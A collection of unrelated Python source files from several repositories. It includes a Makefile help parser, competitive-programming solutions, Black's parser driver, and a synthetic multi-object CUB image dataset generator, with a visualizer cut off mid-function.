{
"source": "515hikaru/make2help",
"score": 3
}
#### File: make2help/make2help/make2help.py
```python
import re
def parse_makefile(lines):
"""
Parse Makefile lines.
"""
lines = [line for line in lines if line != '']
help_pattern = re.compile('(?<=^## ).+')
target_pattern = re.compile('.+(?=:)')
for num, line in enumerate(lines):
find_target = target_pattern.search(line)
if find_target:
target = find_target.group()
            # skip targets that start with '.', like .PHONY
if target.strip().startswith('.'):
continue
help_ = help_pattern.search(lines[num - 1])
if num != 0 and help_:
detail = help_.group()
else:
detail = ''
yield target, detail
def prepare_makefile_lines(makefile_path):
    """Return the Makefile's lines."""
with open(makefile_path, 'r') as makefile:
lines = makefile.readlines()
return lines
def format_makehelp(target, detail):
"""
return "{target}:\t{detail}"
"""
return '{}:\t{}'.format(target, detail)
```
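For context, here is a minimal hypothetical driver for these helpers; the sample Makefile lines below are illustrative, not taken from the repository:

```python
# Hedged usage sketch for the helpers above.
sample = [
    '.PHONY: test\n',
    '## run the test suite\n',
    'test:\n',
    '\tpytest\n',
]
for target, detail in parse_makefile(sample):
    print(format_makehelp(target, detail))
# prints: "test:\trun the test suite"
```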
{
"source": "515hikaru/python-templates",
"score": 2
}
#### File: python-templates/tests/test_fizzbuzz.py
```python
from python_template import fizzbuzz
def test_fizzbuzz():
"""
test for fizzbuzz func
"""
assert fizzbuzz(11) == "11"
assert fizzbuzz(12) == "fizz"
assert fizzbuzz(15) == "fizzbuzz"
assert fizzbuzz(20) == "buzz"
```
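The `fizzbuzz` implementation under test is not part of this row; a minimal version that would satisfy these assertions (a sketch, not necessarily the repository's code) is:

```python
def fizzbuzz(n: int) -> str:
    # Multiples of both 3 and 5 come first, then each factor alone.
    if n % 15 == 0:
        return "fizzbuzz"
    if n % 3 == 0:
        return "fizz"
    if n % 5 == 0:
        return "buzz"
    return str(n)
```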
{
"source": "515hikaru-sandbox/django-restframework-sample",
"score": 2
}
#### File: django-restframework-sample/app/views.py
```python
from rest_framework.response import Response
from rest_framework.viewsets import ViewSet
from .serializer import GreetingSerializer
class GreetingViewset(ViewSet):
def list(self, request):
return Response({'message': 'Hello, World!'})
def create(self, request):
serializer = GreetingSerializer(data=request.data)
        if not serializer.is_valid():
            # invalid payload: reply with a prompt instead of a 400 error
            return Response({'message': "What's your name?"})
name = serializer.data['name']
return Response({'message': f'Hello, {name}!'})
```
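Neither `GreetingSerializer` nor the URL configuration appears in this row. A plausible minimal sketch, with the `name` field inferred from the view's usage (assumptions, not the repository's actual files):

```python
# serializer.py -- hypothetical, inferred from the view's use of a 'name' field
from rest_framework import serializers

class GreetingSerializer(serializers.Serializer):
    name = serializers.CharField(max_length=100)

# urls.py -- typical ViewSet registration with a DRF router
from rest_framework.routers import DefaultRouter
from .views import GreetingViewset

router = DefaultRouter()
router.register(r'greeting', GreetingViewset, basename='greeting')
urlpatterns = router.urls
```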
{
"source": "515hikaru-sandbox/example-unittest-with-boto3",
"score": 2
}
#### File: 515hikaru-sandbox/example-unittest-with-boto3/main.py
```python
import os
from typing import Optional

import boto3
from botocore.exceptions import ClientError
os.environ['AWS_ACCESS_KEY_ID'] = 'DUMMY_VALUE'
os.environ['AWS_SECRET_ACCESS_KEY'] = 'DUMMY_VALUE'
os.environ['AWS_DEFAULT_REGION'] = 'ap-northeast-1'
def get_user(name: str) -> Optional[dict]:
client = boto3.client('cognito-idp')
try:
user = client.admin_get_user(
UserPoolId='DUMMY_USER_POOL_ID',
Username=name,
)
except ClientError as error:
if error.response['Error']['Code'] == 'UserNotFoundException':
return None
raise
return user['UserAttributes']
```
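Given the repository name, a test might stub the Cognito client so no network call is made. This sketch uses botocore's `Stubber` and patches `boto3.client` in the module under test, which is assumed to be importable as `main`:

```python
# Hypothetical test sketch -- not part of the file above.
import boto3
from botocore.stub import Stubber
from unittest.mock import patch

import main

def test_get_user_returns_none_when_missing():
    client = boto3.client('cognito-idp')
    stubber = Stubber(client)
    # Make the stubbed client raise the error the function handles.
    stubber.add_client_error('admin_get_user',
                             service_error_code='UserNotFoundException')
    with stubber, patch('main.boto3.client', return_value=client):
        assert main.get_user('no-such-user') is None
```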
{
"source": "515hikaru/solutions",
"score": 3
}
#### File: abc/104/c_retry2.py
```python
from itertools import combinations
def exclude_combi_idx(combis, scores):
    # drop score entries whose problem index already appears in combis
    a = [score[1] for score in combis]
v = []
for score in scores:
if score[1] in a:
continue
v.append(score)
return v
def set_all_solve(combi):
current = 0
num = 0
for item in combi:
num += item[0]
current += item[2]
return num, current
def track_residue(num, score, current, target):
for i in range(num):
current += score
if current >= target:
return i + 1
return None
def main():
D, G = [int(c) for c in input().split()]
items = []
for idx in range(1, 1+D):
        num, bonasu = [int(c) for c in input().split()]  # bonasu = "bonus" (romaji)
items.append((idx * 100, num, bonasu))
scores = [(num, idx,idx * num + bonasu) for idx, num, bonasu in items]
max_prob = sum([num for num,_, _ in scores])
min_prob = max_prob
for i in range(0, D+1):
combis = list(combinations(scores, i))
# print('i = {}, combinations = {}'.format(i, combis))
for combi in combis:
s = 0
prob = 0
# print('combi = {}'.format(combi))
tmp, tmp2 = set_all_solve(combi)
prob += tmp
s += tmp2
# print('all solves num = {} score = {}'.format(prob, s))
if s >= G:
if prob < min_prob:
min_prob = prob
continue
else:
                v = exclude_combi_idx(combi, scores)[-1]  # only the entry with the largest score is needed
res = track_residue(v[0], v[1], s, G)
if res is None:
continue
if res + prob < min_prob:
# print('track solve: num = {}, score = {}'.format(res + prob, s))
min_prob = res + prob
print(min_prob)
if __name__ == '__main__':
main()
```
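A quick way to smoke-test the solver is to feed it sample input through stdin. The values below are believed to be the first public sample of ABC 104 C ("All Green"); verify against the problem page:

```python
# Hedged smoke test -- append to the script above. Expected output: 3.
import io
import sys

sys.stdin = io.StringIO("2 700\n3 500\n5 800\n")
main()
```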
#### File: abc/106/C.py
```python
def main():
s = input()
k = int(input())
    # case where the string starts with a run of '1's
ss = ''
for w in s:
if w == '1':
ss += w
else:
break
if len(ss) >= k:
print(1)
return
for w in s:
if w != '1':
print(w)
break
if __name__ == '__main__':
main()
```
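Tracing the logic: the answer is 1 when the leading run of '1's is at least `k` characters long; otherwise it is the first non-'1' digit. A worked example, derived directly from the code above:

```python
# Hedged smoke test -- append to the script above. With s = "1214" and
# k = 4, the leading run of '1's has length 1 < k, so '2' is printed.
import io
import sys

sys.stdin = io.StringIO("1214\n4\n")
main()
```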
#### File: abc/109/c.py
```python
def gcd(a,b):
if a < b:
a, b = b, a
if b == 0:
return a
    return gcd(b, a % b)
def gcdlist(l):
if len(l) == 2:
return gcd(l[0], l[1])
f = l.pop()
s = l.pop()
m = gcd(f, s)
l.append(m)
return gcdlist(l)
def main():
n, x = map(int, input().split())
a = [int(v) for v in input().split(' ')]
a.append(x)
a.sort()
dis = [x2 - x1 for x1, x2 in zip(a, a[1:])]
max_ = 0
for i in range(n):
if len(dis) == 1:
max_ = dis[0]
break
try:
max_ = gcdlist(dis)
        except Exception:
max_ = 1
print(max_)
if __name__ == '__main__':
main()
```
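The recursive `gcdlist` above mutates its argument and recurses once per element; an equivalent standard-library formulation (a sketch, not the author's code) simply folds `math.gcd` over the list:

```python
# Equivalent, non-mutating alternative using the standard library.
from functools import reduce
from math import gcd as math_gcd

def gcdlist_stdlib(values):
    return reduce(math_gcd, values)
```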
#### File: abc/110/A.py
```python
def main():
    s = input().split()
s.sort(reverse=True)
print(int(s[0]+s[1])+int(s[2]))
if __name__ == '__main__':
main()
```
{
"source": "515k4/black",
"score": 2
}
#### File: blib2to3/pgen2/driver.py
```python
__author__ = "<NAME> <<EMAIL>>"
__all__ = ["Driver", "load_grammar"]
# Python imports
import io
import os
import logging
import pkgutil
import sys
from typing import (
Any,
IO,
Iterable,
List,
Optional,
Text,
Iterator,
Tuple,
TypeVar,
Generic,
Union,
)
from dataclasses import dataclass, field
# Pgen imports
from . import grammar, parse, token, tokenize, pgen
from logging import Logger
from blib2to3.pytree import _Convert, NL
from blib2to3.pgen2.grammar import Grammar
from contextlib import contextmanager
Path = Union[str, "os.PathLike[str]"]
@dataclass
class ReleaseRange:
start: int
end: Optional[int] = None
tokens: List[Any] = field(default_factory=list)
def lock(self) -> None:
total_eaten = len(self.tokens)
self.end = self.start + total_eaten
class TokenProxy:
def __init__(self, generator: Any) -> None:
self._tokens = generator
self._counter = 0
self._release_ranges: List[ReleaseRange] = []
@contextmanager
def release(self) -> Iterator["TokenProxy"]:
release_range = ReleaseRange(self._counter)
self._release_ranges.append(release_range)
try:
yield self
finally:
# Lock the last release range to the final position that
# has been eaten.
release_range.lock()
def eat(self, point: int) -> Any:
eaten_tokens = self._release_ranges[-1].tokens
if point < len(eaten_tokens):
return eaten_tokens[point]
else:
while point >= len(eaten_tokens):
token = next(self._tokens)
eaten_tokens.append(token)
return token
def __iter__(self) -> "TokenProxy":
return self
def __next__(self) -> Any:
# If the current position is already compromised (looked up)
# return the eaten token, if not just go further on the given
# token producer.
for release_range in self._release_ranges:
assert release_range.end is not None
start, end = release_range.start, release_range.end
if start <= self._counter < end:
token = release_range.tokens[self._counter - start]
break
else:
token = next(self._tokens)
self._counter += 1
return token
def can_advance(self, to: int) -> bool:
# Try to eat, fail if it can't. The eat operation is cached
        # so there won't be any additional cost of eating here
try:
self.eat(to)
except StopIteration:
return False
else:
return True
class Driver(object):
def __init__(
self,
grammar: Grammar,
convert: Optional[_Convert] = None,
logger: Optional[Logger] = None,
) -> None:
self.grammar = grammar
if logger is None:
logger = logging.getLogger(__name__)
self.logger = logger
self.convert = convert
def parse_tokens(self, tokens: Iterable[Any], debug: bool = False) -> NL:
"""Parse a series of tokens and return the syntax tree."""
# XXX Move the prefix computation into a wrapper around tokenize.
proxy = TokenProxy(tokens)
p = parse.Parser(self.grammar, self.convert)
p.setup(proxy=proxy)
lineno = 1
column = 0
indent_columns = []
type = value = start = end = line_text = None
prefix = ""
for quintuple in proxy:
type, value, start, end, line_text = quintuple
if start != (lineno, column):
assert (lineno, column) <= start, ((lineno, column), start)
s_lineno, s_column = start
if lineno < s_lineno:
prefix += "\n" * (s_lineno - lineno)
lineno = s_lineno
column = 0
if column < s_column:
prefix += line_text[column:s_column]
column = s_column
if type in (tokenize.COMMENT, tokenize.NL):
prefix += value
lineno, column = end
if value.endswith("\n"):
lineno += 1
column = 0
continue
if type == token.OP:
type = grammar.opmap[value]
if debug:
self.logger.debug(
"%s %r (prefix=%r)", token.tok_name[type], value, prefix
)
if type == token.INDENT:
indent_columns.append(len(value))
_prefix = prefix + value
prefix = ""
value = ""
elif type == token.DEDENT:
_indent_col = indent_columns.pop()
prefix, _prefix = self._partially_consume_prefix(prefix, _indent_col)
if p.addtoken(type, value, (prefix, start)):
if debug:
self.logger.debug("Stop.")
break
prefix = ""
if type in {token.INDENT, token.DEDENT}:
prefix = _prefix
lineno, column = end
if value.endswith("\n"):
lineno += 1
column = 0
else:
# We never broke out -- EOF is too soon (how can this happen???)
assert start is not None
raise parse.ParseError("incomplete input", type, value, (prefix, start))
assert p.rootnode is not None
return p.rootnode
def parse_stream_raw(self, stream: IO[Text], debug: bool = False) -> NL:
"""Parse a stream and return the syntax tree."""
tokens = tokenize.generate_tokens(stream.readline, grammar=self.grammar)
return self.parse_tokens(tokens, debug)
def parse_stream(self, stream: IO[Text], debug: bool = False) -> NL:
"""Parse a stream and return the syntax tree."""
return self.parse_stream_raw(stream, debug)
def parse_file(
self, filename: Path, encoding: Optional[Text] = None, debug: bool = False
) -> NL:
"""Parse a file and return the syntax tree."""
with io.open(filename, "r", encoding=encoding) as stream:
return self.parse_stream(stream, debug)
def parse_string(self, text: Text, debug: bool = False) -> NL:
"""Parse a string and return the syntax tree."""
tokens = tokenize.generate_tokens(
io.StringIO(text).readline, grammar=self.grammar
)
return self.parse_tokens(tokens, debug)
def _partially_consume_prefix(self, prefix: Text, column: int) -> Tuple[Text, Text]:
lines: List[str] = []
current_line = ""
current_column = 0
wait_for_nl = False
for char in prefix:
current_line += char
if wait_for_nl:
if char == "\n":
if current_line.strip() and current_column < column:
res = "".join(lines)
return res, prefix[len(res) :]
lines.append(current_line)
current_line = ""
current_column = 0
wait_for_nl = False
elif char in " \t":
current_column += 1
elif char == "\n":
# unexpected empty line
current_column = 0
else:
# indent is finished
wait_for_nl = True
return "".join(lines), current_line
def _generate_pickle_name(gt: Path, cache_dir: Optional[Path] = None) -> Text:
head, tail = os.path.splitext(gt)
if tail == ".txt":
tail = ""
name = head + tail + ".".join(map(str, sys.version_info)) + ".pickle"
if cache_dir:
return os.path.join(cache_dir, os.path.basename(name))
else:
return name
def load_grammar(
gt: Text = "Grammar.txt",
gp: Optional[Text] = None,
save: bool = True,
force: bool = False,
logger: Optional[Logger] = None,
) -> Grammar:
"""Load the grammar (maybe from a pickle)."""
if logger is None:
logger = logging.getLogger(__name__)
gp = _generate_pickle_name(gt) if gp is None else gp
if force or not _newer(gp, gt):
logger.info("Generating grammar tables from %s", gt)
g: grammar.Grammar = pgen.generate_grammar(gt)
if save:
logger.info("Writing grammar tables to %s", gp)
try:
g.dump(gp)
except OSError as e:
logger.info("Writing failed: %s", e)
else:
g = grammar.Grammar()
g.load(gp)
return g
def _newer(a: Text, b: Text) -> bool:
"""Inquire whether file a was written since file b."""
if not os.path.exists(a):
return False
if not os.path.exists(b):
return True
return os.path.getmtime(a) >= os.path.getmtime(b)
def load_packaged_grammar(
package: str, grammar_source: Text, cache_dir: Optional[Path] = None
) -> grammar.Grammar:
"""Normally, loads a pickled grammar by doing
pkgutil.get_data(package, pickled_grammar)
where *pickled_grammar* is computed from *grammar_source* by adding the
Python version and using a ``.pickle`` extension.
However, if *grammar_source* is an extant file, load_grammar(grammar_source)
is called instead. This facilitates using a packaged grammar file when needed
but preserves load_grammar's automatic regeneration behavior when possible.
"""
if os.path.isfile(grammar_source):
gp = _generate_pickle_name(grammar_source, cache_dir) if cache_dir else None
return load_grammar(grammar_source, gp=gp)
pickled_name = _generate_pickle_name(os.path.basename(grammar_source), cache_dir)
data = pkgutil.get_data(package, pickled_name)
assert data is not None
g = grammar.Grammar()
g.loads(data)
return g
def main(*args: Text) -> bool:
"""Main program, when run as a script: produce grammar pickle files.
Calls load_grammar for each argument, a path to a grammar text file.
"""
if not args:
args = tuple(sys.argv[1:])
logging.basicConfig(level=logging.INFO, stream=sys.stdout, format="%(message)s")
for gt in args:
load_grammar(gt, save=True, force=True)
return True
if __name__ == "__main__":
sys.exit(int(not main()))
```
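For context, a minimal usage sketch of `Driver`. This assumes it runs inside a Black checkout, where `blib2to3.pygram` provides prebuilt `Grammar` objects; with no `convert` callback supplied, the result is a raw parse tree:

```python
# Hedged usage sketch -- not part of the file above.
from blib2to3 import pygram
from blib2to3.pgen2.driver import Driver

driver = Driver(pygram.python_grammar)
tree = driver.parse_string("x = 1\n")
print(tree)
```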
{
"source": "51616/split",
"score": 2
}
#### File: split/spair/data.py
```python
import tensorflow as tf
import tensorflow_addons as tfa
import numpy as np
from random import randint, choice, shuffle
import os
from glob import glob
from PIL import Image
import math
from pathlib import Path
import matplotlib.pyplot as plt
def load_cub_masked():
train_images = np.load('data/cub_train_seg_14x14_pad_20_masked.npy')
test_images = np.load('data/cub_test_seg_14x14_pad_20_masked.npy')
return train_images, None, test_images, None
def calculateIntersection(a0, a1, b0, b1):
if a0 >= b0 and a1 <= b1: # Contained
intersection = a1 - a0
elif a0 < b0 and a1 > b1: # Contains
intersection = b1 - b0
elif a0 < b0 and a1 > b0: # Intersects right
intersection = a1 - b0
elif a1 > b1 and a0 < b1: # Intersects left
intersection = b1 - a0
else: # No intersection (either side)
intersection = 0
return intersection
def calculate_overlap(rand_x,rand_y,drawn_boxes):
    # return True if the new box overlaps any already-drawn box by more than 15%
for box in drawn_boxes:
x,y = box[0], box[1]
if calculateIntersection(rand_x,rand_x+14,x,x+14) * calculateIntersection(rand_y,rand_y+14,y,y+14) / 14**2 > 0.15:
return True
return False
class MultiCUB:
def __init__(self, data, reshape=True):
self.num_channel = data[0].shape[-1]
self.train_x = data[0]
self.train_y = data[1]
self.test_x = data[2]
self.test_y = data[3]
if reshape:
self.train_x = tf.image.resize(self.train_x,(14,14)).numpy() #[28,28] -> [14,14]
self.test_x = tf.image.resize(self.test_x,(14,14)).numpy()
self.bg_list = glob('data/kylberg/*.png')
#triad hard
self.train_colors_triad = [(195,135,255),(193,255,135),(255,165,135),(81,197,255),(255,229,81),(255,81,139)]
self.test_colors_triad = [(255,125,227),(125,255,184),(255,205,125)]
#easy colors
self.train_colors = [(100, 209, 72) , (209, 72, 100) , (209, 127, 72), (72, 129, 209) , (84, 184, 209), (209, 109, 84), (184, 209, 84), (109, 84, 209)]
self.test_colors = [(222, 222, 102),(100,100,219),(219,100,219),(100,219,100)]
def create_sample(self, n, width, height, bg = None, test=False):
canvas = np.zeros([width, height, self.num_channel], np.float32)
if bg=='solid_random':
brightness = randint(0,255)
r = randint(0,brightness)/255.
g = randint(0,brightness)/255.
b = randint(0,brightness)/255.
canvas[:,:,0] = r
canvas[:,:,1] = g
canvas[:,:,2] = b
elif bg=='solid_fixed':
color = choice(self.train_colors)
canvas[:,:,0] = color[0]/255.
canvas[:,:,1] = color[1]/255.
canvas[:,:,2] = color[2]/255.
elif bg=='unseen_solid_fixed':
color = choice(self.test_colors)
canvas[:,:,0] = color[0]/255.
canvas[:,:,1] = color[1]/255.
canvas[:,:,2] = color[2]/255.
elif bg=='white':
canvas[:,:,:] = np.ones_like(canvas)
elif bg=='texture':
img_name = np.random.choice(self.bg_list)
# print(img_name)
img = np.tile(np.array(Image.open(img_name))[:,:,np.newaxis]/255.,[1,1,3])
# print(img.shape)
canvas[:,:,:] = tf.image.resize(img, size=[width,height] )
if 'rot' in bg: #ckb_rot_6
temp_canvas = np.zeros([width*4, height*4, self.num_channel], np.float32)
if 'unseen' in bg:
shuffle(self.test_colors_triad)
colors = self.test_colors_triad[:2]
else:
shuffle(self.train_colors_triad)
colors = self.train_colors_triad[:2]
cell_size = int(bg[-1])
num_ckb = (height*4)//cell_size
for i in range(num_ckb):
for j in range(num_ckb):
temp_canvas[i*cell_size:(i+1)*cell_size,j*cell_size:(j+1)*cell_size,0] = colors[(i+j)%2][0]/255.
temp_canvas[i*cell_size:(i+1)*cell_size,j*cell_size:(j+1)*cell_size,1] = colors[(i+j)%2][1]/255.
temp_canvas[i*cell_size:(i+1)*cell_size,j*cell_size:(j+1)*cell_size,2] = colors[(i+j)%2][2]/255.
rot_image = tfa.image.rotate(tf.convert_to_tensor(temp_canvas),tf.constant(tf.random.uniform([],-1,1)*math.pi/2,dtype=tf.float32),interpolation='BILINEAR')
canvas = tf.image.central_crop(rot_image,0.25).numpy()
# plt.imshow(canvas)
# plt.show()
elif 'ckb' in bg:
if 'unseen' in bg:
shuffle(self.test_colors)
colors = self.test_colors[:2]
else:
shuffle(self.train_colors)
colors = self.train_colors[:2]
num_ckb = int(bg[0])
h = height//num_ckb; w = width//num_ckb
for i in range(num_ckb):
for j in range(num_ckb):
canvas[i*h:(i+1)*h,j*w:(j+1)*w,0] = colors[(i+j)%2][0]/255.
canvas[i*h:(i+1)*h,j*w:(j+1)*w,1] = colors[(i+j)%2][1]/255.
canvas[i*h:(i+1)*h,j*w:(j+1)*w,2] = colors[(i+j)%2][2]/255.
drawn_boxes = [] #x,y
for i in range(n):
rand_x = np.random.randint(0, width-14)
rand_y = np.random.randint(0, height-14)
while calculate_overlap(rand_x,rand_y,drawn_boxes):
rand_x = np.random.randint(0, width-14)
rand_y = np.random.randint(0, height-14)
drawn_boxes.append((rand_x,rand_y))
if not test:
rand_img = self.train_x[np.random.randint(0, self.train_x.shape[0])]
else:
rand_img = self.test_x[np.random.randint(0, self.test_x.shape[0])]
# rand_img = rand_img/255.
# print(rand_img)
# plt.imshow(rand_img)
# plt.show()
# rand_img = cv2.cvtColor(rand_img, cv2.COLOR_RGB2RGBA)
alpha_img = np.where(np.max(rand_img,axis=-1)>0,1.0,0.0)
rand_img = rand_img/255.
alpha_bg = 1.0 - alpha_img
alpha_img = alpha_img[:,:,np.newaxis]
alpha_bg = alpha_bg[:,:,np.newaxis]
# print('alpha_img.shape',alpha_img.shape)
# print('alpha_bg.shape',alpha_bg.shape)
canvas[rand_x:rand_x+14 , rand_y:rand_y+14] = alpha_img * rand_img + alpha_bg * canvas[rand_x:rand_x+14 , rand_y:rand_y+14]
# plt.imshow(canvas)
# plt.show()
# canvas[rand_x:rand_x+14 , rand_y:rand_y+14, :] = \
# np.clip(canvas[rand_x:rand_x+14 , rand_y:rand_y+14, :] + rand_img/255. , 0., 1.)
return canvas
def create_dataset(self, nsamples, digits, size,bg=None, test=False):
dataset_buffer = np.zeros([nsamples, size, size, self.num_channel])
if test:
count = np.zeros([nsamples])
for i in range(nsamples):
# print('sample no:',i)
rand_n = np.random.randint(digits[0], digits[1]+1)
# print('rand_n:',rand_n)
if test:
count[i] = rand_n
sample = self.create_sample(rand_n, size, size,bg, test)
dataset_buffer[i] = sample
if test:
return dataset_buffer.astype(np.float32), count
return dataset_buffer.astype(np.float32)
def random_crop(input_image,crop_size):
cropped_image = tf.image.random_crop(input_image, size=[crop_size, crop_size, input_image.shape[2]])
return cropped_image
def resize_random_crop(img,crop_size,resize_size):
return tf.image.resize(random_crop(img,crop_size),resize_size)
def _bytes_feature(value):
"""Returns a bytes_list from a string / byte."""
if isinstance(value, type(tf.constant(0))):
value = value.numpy() # BytesList won't unpack a string from an EagerTensor.
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _float_feature(value):
"""Returns a float_list from a float / double."""
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
def _int64_feature(value):
"""Returns an int64_list from a bool / enum / int / uint."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def serialize_images_and_labels(images,labels):
feature = {'image': _bytes_feature(tf.io.serialize_tensor(images)) ,'label': _int64_feature(labels)}
# Create an example protocol buffer
example = tf.train.Example(features=tf.train.Features(feature=feature))
return example.SerializeToString()
def tf_serialize_images_and_labels(images,labels):
tf_string = tf.py_function(
serialize_images_and_labels,
(images,labels), # pass these args to the above function.
tf.string) # the return type is `tf.string`.
return tf.reshape(tf_string, ()) # The result is a scalar
def parse_48_with_label(example_proto,size,channel):
feature_description = {
'image': tf.io.FixedLenFeature([], tf.string, default_value=''),
'label': tf.io.FixedLenFeature([], tf.int64, default_value=0)
}
example = tf.io.parse_single_example(example_proto, feature_description)
image = tf.io.parse_tensor(example['image'], out_type=tf.float32)
image = tf.reshape(image, [size,size,channel])
label = example['label']
return image,label
def create_cub_tfrec(name):
data = load_cub_masked()
multi_cub = MultiCUB(data,reshape=False)
if (name != 'cub_solid_fixed') and (name != 'cub_ckb_rot_6'):
print(name)
raise NotImplementedError('Undefined dataset')
# name = 'cub_solid_fixed' #'cub_ckb_rot_6', 'cub_16x16_ckb'
Path('data/multi_cub/').mkdir(parents=True, exist_ok=True)
numpy_test_unseen_dataset, count_test_unseen_dataset = multi_cub.create_dataset(1000,digits=[0,5],size=48,bg= 'unseen_' + name[4:] , test=True) #16x16_ckb_unseen
test_dataset_unseen = tf.data.Dataset.from_tensor_slices((numpy_test_unseen_dataset,count_test_unseen_dataset))
test_dataset_unseen = test_dataset_unseen.map(tf_serialize_images_and_labels)
tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/test_unseen_' + name + '.tfrec')
tfrec.write(test_dataset_unseen)
numpy_train_dataset = multi_cub.create_dataset(100000,digits=[0,5],size=48,bg=name[4:])
numpy_test_dataset, count_test_dataset = multi_cub.create_dataset(1000,digits=[0,5],size=48,bg=name[4:],test=True)
test_dataset = tf.data.Dataset.from_tensor_slices((numpy_test_dataset,count_test_dataset)).map(tf_serialize_images_and_labels)
tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/test_' + name + '.tfrec')
tfrec.write(test_dataset)
train_dataset = tf.data.Dataset.from_tensor_slices(numpy_train_dataset).map(tf.io.serialize_tensor)
tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/train_' + name + '.tfrec')
tfrec.write(train_dataset)
def get_cub_dataset(name,size=48,channel=3):
return get_cub_tfrec(name,size,channel)
def get_cub_tfrec(name,size=48,channel=3):
def parse(x):
result = tf.io.parse_tensor(x, out_type=tf.float32)
result = tf.reshape(result, [size, size, channel])
return result
train_path = 'data/multi_cub/train_' + name + '.tfrec'
test_path = 'data/multi_cub/test_' + name + '.tfrec'
test_unseen_path = 'data/multi_cub/test_unseen_' + name + '.tfrec'
if (not os.path.exists(train_path)) or (not os.path.exists(test_path)) or (not os.path.exists(test_unseen_path)):
print('TFRecord files not found, creating TFRecord files. This might take a while.')
create_cub_tfrec(name)
train_dataset = tf.data.TFRecordDataset(train_path).map(parse, num_parallel_calls=tf.data.experimental.AUTOTUNE)
test_dataset = tf.data.TFRecordDataset(test_path).map(lambda x: parse_48_with_label(x,size,channel), num_parallel_calls=tf.data.experimental.AUTOTUNE)
test_dataset_unseen = tf.data.TFRecordDataset(test_unseen_path).map(lambda x: parse_48_with_label(x,size,channel), num_parallel_calls=tf.data.experimental.AUTOTUNE)
return train_dataset, [test_dataset,test_dataset_unseen], [-1,size,size,channel], [-1,size,size,channel]
if __name__ == "__main__":
get_cub_tfrec(name='cub_ckb_rot_6')
# os.environ["CUDA_VISIBLE_DEVICES"]="-1"
# data = load_cub_masked()
# multi_cub = MultiCUB(data,reshape=False)
# name = 'cub_ckb_rot_6' #'cub_ckb_rot_6', 'cub_16x16_ckb'
# numpy_test_unseen_dataset, count_test_unseen_dataset = multi_cub.create_dataset(1000,digits=[0,5],size=48,bg='unseen_cub_ckb_rot_6',test=True) #16x16_ckb_unseen
# for img in numpy_test_unseen_dataset:
# plt.imshow(img)
# plt.show()
# test_dataset_unseen = tf.data.Dataset.from_tensor_slices((numpy_test_unseen_dataset,count_test_unseen_dataset))
# test_dataset_unseen = test_dataset_unseen.map(tf_serialize_images_and_labels)
# tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/test_unseen_' + name + '.tfrec')
# tfrec.write(test_dataset_unseen)
# numpy_train_dataset = multi_cub.create_dataset(100000,digits=[0,5],size=48,bg='cub_ckb_rot_6')
# numpy_test_dataset, count_test_dataset = multi_cub.create_dataset(1000,digits=[0,5],size=48,bg='cub_ckb_rot_6',test=True)
# test_dataset = tf.data.Dataset.from_tensor_slices((numpy_test_dataset,count_test_dataset)).map(tf_serialize_images_and_labels)
# tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/test_' + name + '.tfrec')
# tfrec.write(test_dataset)
# train_dataset = tf.data.Dataset.from_tensor_slices(numpy_train_dataset).map(tf.io.serialize_tensor) # .map(random_crop)
# tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/train_' + name + '.tfrec')
# tfrec.write(train_dataset)
#######################################################################################################
# train_dataset, test_dataset, input_shape, test_size = get_cub_dataset('cub_solid_fixed_triad')
# for i, train_data in enumerate(train_dataset):
# print(train_data.shape)
# plt.imshow( tf.squeeze(train_data) ,cmap='gray')
# plt.show()
# if i ==3:
# break
# for i, (image,count) in enumerate(test_dataset[1]):
# print(image.shape)
# plt.imshow( tf.squeeze(image) ,cmap='gray')
# plt.show()
# if i ==3:
# break
```
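A hypothetical smoke test for the composition logic above. It assumes the CUB `.npy` arrays referenced in `load_cub_masked` exist under `data/`:

```python
# Hedged smoke test: build one 48x48 canvas with up to three birds on a
# fixed solid background. Requires the data/*.npy files to be present.
data = load_cub_masked()
mc = MultiCUB(data, reshape=False)
canvas = mc.create_sample(3, 48, 48, bg='solid_fixed')
print(canvas.shape)  # expected: (48, 48, 3)
```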
#### File: split/spair/visualizer.py
```python
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import tensorflow as tf
import warnings
# plt.tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
mpl.use('agg')
mpl.rcParams['figure.dpi'] = 300
mpl.rcParams['savefig.dpi'] = 300
warnings.filterwarnings("ignore", module="matplotlib")
def reconstruction_test(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
#Get a batch of test images
test_ds = test_dataset.take(n).shuffle(n,seed=1)
for test_data in test_ds:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid,
all_glimpses, obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, *more_outputs) = model(x_test)
num_cells = z_where.shape[1]*z_where.shape[2]
f, ax = plt.subplots(1, 3)
ax[0].set_xticks(np.arange(0, h*n, w))
ax[0].set_yticks(np.arange(0, h*(num_cells+2), w))
ax[1].set_xticks(np.arange(0, h*n, w))
ax[1].set_yticks(np.arange(0, h*(num_cells+2), w))
ax[2].set_xticks(np.arange(0, h*n, w))
ax[2].set_yticks(np.arange(0, h*(num_cells+2), w))
# num_channel = x_recon.shape[-1]
obj_recon = obj_full_recon_unnorm[:,:,:,:,:channel]
obj_alpha = obj_full_recon_unnorm[:,:,:,:,channel:]
z_depth = tf.reshape(z_depth, [n, num_cells, 1, 1, 1])
z_pres = tf.reshape(tf.round(tf.sigmoid(z_pres_logits)), [n, num_cells, 1, 1, 1])
canvas = np.empty((h*(num_cells+2), w*n, channel))
canvas_weighted = np.empty((h*(num_cells+2), w*n, channel))
canvas_weights_only = np.empty((h*(num_cells+2), w*n, channel)) # only weights of that part
for i in range(n):
canvas_weights_only[0:h,i*w:(i+1)*w, :] = canvas_weighted[0:h,i*w:(i+1)*w, :] = canvas[0:h,i*w:(i+1)*w, :] = images[i,:,:,:3]
